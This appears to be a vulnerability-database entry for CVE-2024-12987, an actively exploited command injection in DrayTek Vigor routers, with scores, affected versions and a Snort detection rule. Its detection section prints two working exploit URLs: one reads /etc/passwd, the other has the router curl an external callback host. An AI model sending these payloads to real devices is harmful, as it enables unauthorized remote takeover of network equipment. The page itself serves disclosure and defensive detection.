cbcvebase.
CVE-2024-12987
published 2024-12-27

CVE-2024-12987: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-06-05
Exploited in the wild
EPSS
98.13%
99.9th percentile
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.

Affected

4 ranges
VendorProductVersion rangeFixed in
draytekvigor2960
draytekvigor2960_firmware
draytekvigor300b
draytekvigor300b_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/mainfunction.cgi/apmcfgupload
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}}
bytes
|b4 25 35 32 24 63 25 35 32 24 63|
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets the `session` parameter in a GET request to `/cgi-bin/mainfunction.cgi/apmcfgupload`; injection uses `%52$c%52$c` (printf-style format string) to insert newlines/special chars, followed by shell commands using `${IFS}` as a space substitute.
  • Snort/Suricata SID 2059890 detects the attack by matching GET requests to the vulnerable URI combined with the byte sequence `|b4 25 35 32 24 63 25 35 32 24 63|` following `session=` in the URI.
  • Vulnerable DrayTek devices can be fingerprinted via FOFA using the query targeting the DWS server header and specific JavaScript/language markers.
  • Successful exploitation response contains `root:.*:0:0:` in the body (passwd file output) and the `DWS` server header with HTTP 200 status.
  • Out-of-band (OOB) detection: a second exploit variant issues a `curl` to an external callback URL via the same injection vector; DNS interaction confirms blind RCE.
  • ·The vulnerability is unauthenticated (PR:N) and exploitable remotely with no user interaction; the web management interface should not be exposed to the internet.
  • ·Snort rule metadata specifies `tls_state TLSDecrypt` and `deployment SSLDecrypt`, meaning TLS-encrypted management traffic must be decrypted for the signature to fire.
  • ·Affected firmware versions are Vigor2960, Vigor300B, and Vigor3900 running ≤1.5.1.4; version 1.5.1.5 patches the issue.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck6.9MEDIUM
cisa6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.